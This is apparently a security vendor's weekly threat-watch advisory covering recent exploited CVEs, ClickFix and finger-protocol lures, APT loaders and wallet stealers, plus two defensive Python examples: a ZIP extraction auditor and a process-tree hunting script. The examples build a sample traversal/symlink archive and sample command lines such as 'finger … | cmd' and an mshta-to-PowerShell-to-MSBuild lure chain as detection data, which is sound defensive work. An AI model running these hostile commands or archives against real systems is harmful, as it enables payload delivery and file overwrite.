Breach Barometer: From V8 Exploits to Wallet Drains
- SISA Weekly Threat Watch -
SISA Weekly Threat Watch – our weekly feature brings you a quick snapshot of the major security vulnerabilities that posed a threat to organizations worldwide. These recurring, actionable threat advisories also provide information and recommendations that help security teams take appropriate action to defend against the latest critical threats.
1. Identity Gateways Under Fire
Advanced actors are zero-daying identity and access edge gear to walk past authentication and plant stealthy implants, turning gateways into persistence beacons.
- Citrix NetScaler & Cisco ISE zero-days chained — Pre-auth bypass (Citrix “Bleed 2”, CVE-2025-5777) plus Cisco ISE RCE (CVE-2025-20337) used to drop a fileless Tomcat-thread web shell (“IdentityAuditAction”) with DES-obfuscated C2 and listener persistence.
2. ClickFix & Retro-Protocol Social Engineering
Old Windows tricks and legacy protocols are back—now weaponized as copy-paste payload rails.
- Finger protocol abuse — “finger user@host | cmd” pipes attacker scripts straight into cmd.exe to fetch Python malware or NetSupport RAT; campaigns hide behind fake CAPTCHA “verification” prompts.
- Amatera Stealer via ClickFix — Run-dialog lures launch mshta → PowerShell → MSBuild to inject a PureCrypter-packed .NET DLL; Amatera harvests creds/wallets and conditionally drops NetSupport RAT.
3. APT Tradecraft: DNS/AitM & Long-Haul Loaders
State-aligned groups are shifting from simple phish to infrastructure-level hijack and multi-year, low-noise loaders.
- PlushDaemon EdgeStepper — Go backdoor on edge devices hijacks DNS to reroute software updates, delivering LittleDaemon → DaemonicLogistics → SlowStepper for espionage across semiconductor, manufacturing, and academia.
- APT24 “BadAudio” — Heavily-obfuscated DLL loader delivered via watering holes, a Taiwanese JS supply-chain breach, and themed spearphish; AES-encrypted beacons and in-memory payloads (incl. Cobalt Strike) with persistently low AV detection.
4. Browser & Archive Exploits
High-frequency V8 bugs and unsafe ZIP/symlink parsing keep drive-by compromise viable at scale.
- Chrome V8 zero-day (CVE-2025-13223) — Actively exploited type-confusion enabling heap corruption and potential RCE; companion V8 bug (CVE-2025-13224) found by Google’s “Big Sleep” AI.
- 7-Zip symlink RCE (CVE-2025-11001/11002) — Symbolic-link traversal lets attacker ZIPs write outside extract paths; public PoC and reports of in-the-wild abuse on Windows, risky when 7-Zip runs elevated or in pipelines.
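The 7-Zip item above is a reminder that any extractor run in a pipeline or with elevated rights should refuse archive members that can write outside the target directory. The following is an added example, not code from the advisory or from 7-Zip: a small audit written with Python's standard zipfile module that rejects absolute paths, `..` traversal, symbolic-link members, and members whose path runs through a symlink member. The hostile archive is constructed inline; the member names and the `/etc` link target are sample values, not artefacts from any reported campaign.

```python
import io
import stat
import tempfile
import zipfile
from pathlib import Path, PurePosixPath
from typing import Dict, List, Optional


def is_symlink_entry(info: zipfile.ZipInfo) -> bool:
    """Unix archivers store the file mode in the high 16 bits of external_attr."""
    return stat.S_ISLNK(info.external_attr >> 16)


def classify_entry(info: zipfile.ZipInfo, dest: Path) -> Optional[str]:
    """Return why a member must not be extracted under `dest`, or None if it is safe."""
    name = info.filename.replace("\\", "/")
    p = PurePosixPath(name)
    if p.is_absolute() or (len(name) > 1 and name[1] == ":"):   # "/x" or "C:..."
        return "absolute path"
    if ".." in p.parts:
        return "parent-directory traversal"
    if is_symlink_entry(info):
        return "symbolic link"
    # Final containment check: the resolved target must sit below dest.
    dest = dest.resolve()
    target = (dest / Path(*p.parts)).resolve()
    if target != dest and dest not in target.parents:
        return "escapes extraction directory"
    return None


def audit_archive(zip_bytes: bytes, dest: Path) -> Dict[str, Optional[str]]:
    """Map every member name to a rejection reason, or None when it may be extracted.

    Symlink members are rejected outright, and any later member whose path runs
    through a symlink member is rejected too: on a naive extractor that member
    would be written wherever the link points.
    """
    verdicts: Dict[str, Optional[str]] = {}
    link_prefixes: List[tuple] = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            p = PurePosixPath(info.filename.replace("\\", "/"))
            reason = classify_entry(info, dest)
            if reason is None and any(p.parts[: len(lp)] == lp for lp in link_prefixes):
                reason = "path passes through a symlink entry"
            if reason == "symbolic link":
                link_prefixes.append(p.parts)
            verdicts[info.filename] = reason
    return verdicts


def safe_extract(zip_bytes: bytes, dest: Path) -> List[str]:
    """Extract only the members that pass the audit; return their names."""
    verdicts = audit_archive(zip_bytes, dest)
    extracted: List[str] = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if verdicts[info.filename] is None:
                zf.extract(info, str(dest))
                extracted.append(info.filename)
    return extracted


def build_sample_zip() -> bytes:
    """Constructed hostile archive (sample data, not a real-world artefact)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("docs/readme.txt", "benign content\n")
        zf.writestr("../../escape.txt", "would land two levels above dest\n")
        link = zipfile.ZipInfo("docs/link")
        link.create_system = 3                              # Unix origin
        link.external_attr = (stat.S_IFLNK | 0o777) << 16   # mode bits say: symlink
        zf.writestr(link, "/etc")                           # link target is the member data
        zf.writestr("docs/link/hosts", "would be written into /etc via the link\n")
    return buf.getvalue()


def demo() -> List[str]:
    """Run the audit against a fresh temp dir and return what actually got extracted."""
    with tempfile.TemporaryDirectory() as tmp:
        return safe_extract(build_sample_zip(), Path(tmp))


if __name__ == "__main__":
    for name, verdict in audit_archive(build_sample_zip(), Path("extract-demo")).items():
        print(f"{'OK    ' if verdict is None else 'REJECT'} {name}  {verdict or ''}")
```

Only `docs/readme.txt` survives the audit. The same four checks apply to any extractor you wrap in CI (tar, 7z, unzip): decide per member before anything is written, and treat a symlink member as a reason to reject the whole archive when the extractor runs with elevated rights.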
5. Perimeter & Identity Appliances: Patch-Now Queue
Edge and observability platforms present crisp privilege and availability wins for attackers this week.
- FortiWeb OS command injection (CVE-2025-58034) — Auth-required but actively exploited; crafted requests/CLI lead to arbitrary OS command execution; fixes across multiple FortiWeb trains.
- SonicOS SSLVPN DoS (CVE-2025-40601) — Remote, unauth crash of Gen7/Gen8 firewalls; plus email gateway RCE/info-leak bugs — urgent updates advised.
- Grafana Enterprise SCIM impersonation (CVE-2025-41115) — SCIM externalId → user.uid collision allows instant admin takeover when SCIM is enabled; patched in 12.3.0/12.2.1/12.1.3/12.0.6.
6. Web3 Drains & Wallet Spoofs
Threat actors are bypassing classic C2 by laundering exfil over blockchains and weaponizing “wallet UX”.
- Safery Chrome wallet — Fake ETH wallet extension steals seed phrases and encodes them into micro-transactions on Sui; attacker later decodes on-chain data and empties victim wallets.
7. Ransomware, Mobile, and Fraud Pulse
Crimeware is leaning into outcome-driven operations: faster exfil, cross-platform reach, and extortion without encryption.
- RaaS and stealers — White Lock, Beast, Qilin (quadruple extortion) surge; Stealerium returns with flexible exfil.
- Mobile kits — BTMOB and SparkKitty span Android/iOS with overlays, OCR for wallet keys, and app-store infiltration.
- Payments fraud evolution — Executive-workflow impersonation, embedded-wallet abuse, synthetic IDs/deepfakes, and transaction-mutation exploits shorten detection windows.
8. Internet Fabric Fragility
Platform-level outages remain a business-continuity risk even when your stack is healthy.
- Cloudflare global incident — HTTP 500s, dashboard/API impact across multiple regions; partial recovery noted—revisit multi-CDN and DNS failover runbooks.
Proactive Steps for the Week
- Patch & restart: Chrome (all Chromium variants), 7-Zip ≥25.00, FortiWeb to fixed trains, SonicOS/Email Security, Grafana Enterprise (or disable SCIM).
- Ring-fence edge gear: Remove internet exposure for management planes; enforce MFA, jump hosts, and IP allowlists on Citrix, Cisco ISE, FortiWeb, SonicWall.
- Hunt & contain: Query for finger * | cmd, mshta → powershell → msbuild, unexpected Tomcat listeners/classes on Cisco ISE, DNS changes on edge devices, and extensions making blockchain RPCs.
- Dev pipeline hygiene: Block/alert on JSON Keeper/JSONsilo/npoint pulls from build/dev nets; SRI/CSP for third-party JS; mandatory review of external “assessment/demo” repos.
- Web3/user hardening: Remove unvetted wallet extensions; baseline allowed chains/RPC endpoints; monitor for on-chain micro-txns triggered during wallet import.
- BC/DR drill: Re-run failover tests for CDN/DNS providers; pre-approve direct-to-origin playbooks for Cloudflare-style outages.
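Two of the hunt queries in the list above (the `finger * | cmd` rail from section 2 and the mshta → PowerShell → MSBuild chain) expressed as detection logic over sample telemetry. This is an added example, not content from the advisory: the process-creation events are constructed, and the field names, PIDs and hostnames are assumptions to be mapped onto your own EDR or Sysmon schema.

```python
import re
from typing import Dict, List, Sequence

# Constructed sample process-creation events (hypothetical telemetry, not real logs).
SAMPLE_EVENTS: List[Dict] = [
    {"pid": 100, "ppid": 1,   "image": "explorer.exe",   "cmd": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": "cmd.exe",        "cmd": "cmd.exe /c finger joe@files.example.invalid | cmd"},
    {"pid": 300, "ppid": 100, "image": "mshta.exe",      "cmd": "mshta.exe https://lure.example.invalid/verify.hta"},
    {"pid": 301, "ppid": 300, "image": "powershell.exe", "cmd": "powershell.exe -w hidden -enc QQBCAEMA"},
    {"pid": 302, "ppid": 301, "image": "msbuild.exe",    "cmd": "msbuild.exe C:\\Users\\Public\\stage.proj"},
    # Benign developer activity: powershell -> msbuild without the mshta parent.
    {"pid": 400, "ppid": 100, "image": "powershell.exe", "cmd": "powershell.exe ./build.ps1"},
    {"pid": 401, "ppid": 400, "image": "msbuild.exe",    "cmd": "msbuild.exe build.proj"},
    # Near miss: the word "fingerprint" must not trigger the finger rule.
    {"pid": 500, "ppid": 100, "image": "cmd.exe",        "cmd": "cmd.exe /c echo fingerprint | cmd"},
]

# "finger <no pipe in between> | cmd" with cmd optionally suffixed by .exe.
FINGER_PIPE = re.compile(r"\bfinger\b[^|]*\|\s*cmd(?:\.exe)?\b", re.IGNORECASE)

# Parent -> child -> grandchild images for the ClickFix chain in section 2.
CLICKFIX_CHAIN: Sequence[str] = ("mshta.exe", "powershell.exe", "msbuild.exe")


def detect_finger_pipe(events: Sequence[Dict]) -> List[int]:
    """PIDs whose command line pipes finger output into cmd."""
    return [e["pid"] for e in events if FINGER_PIPE.search(e["cmd"])]


def detect_process_chain(events: Sequence[Dict], chain: Sequence[str]) -> List[List[int]]:
    """PID paths (root first) whose direct ancestry matches `chain` exactly.

    Walks up from every process whose image equals the last element of the
    chain, so an unrelated intermediate parent (explorer.exe in the benign
    build above) breaks the match instead of producing a false positive.
    """
    by_pid = {e["pid"]: e for e in events}
    hits: List[List[int]] = []
    for e in events:
        if e["image"].lower() != chain[-1].lower():
            continue
        path = [e["pid"]]
        cur = e
        matched = True
        for expected in reversed(chain[:-1]):
            cur = by_pid.get(cur["ppid"])
            if cur is None or cur["image"].lower() != expected.lower():
                matched = False
                break
            path.append(cur["pid"])
        if matched:
            hits.append(path[::-1])
    return hits


def hunt(events: Sequence[Dict]) -> Dict[str, list]:
    """Run both detections and return findings keyed by rule name."""
    return {
        "finger_pipe_to_cmd": detect_finger_pipe(events),
        "mshta_powershell_msbuild": detect_process_chain(events, CLICKFIX_CHAIN),
    }


if __name__ == "__main__":
    for rule, findings in hunt(SAMPLE_EVENTS).items():
        print(f"{rule}: {findings or 'no hits'}")
```

Against the sample set the finger rule fires only on PID 200 and the chain rule only on the 300 → 301 → 302 lineage; the legitimate PowerShell-driven build (400 → 401) is left alone because its parent is not mshta.exe. The same ancestry walk generalizes to the other chains in the advisory by swapping the tuple passed to `detect_process_chain`.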
To get daily updates on the critical vulnerabilities being exploited by threat actors, subscribe to SISA Daily Threat Watch – our daily actionable threat advisories.
For a deeper understanding of how you can prevent these threats from affecting your organization, request a call to get in touch with our experts.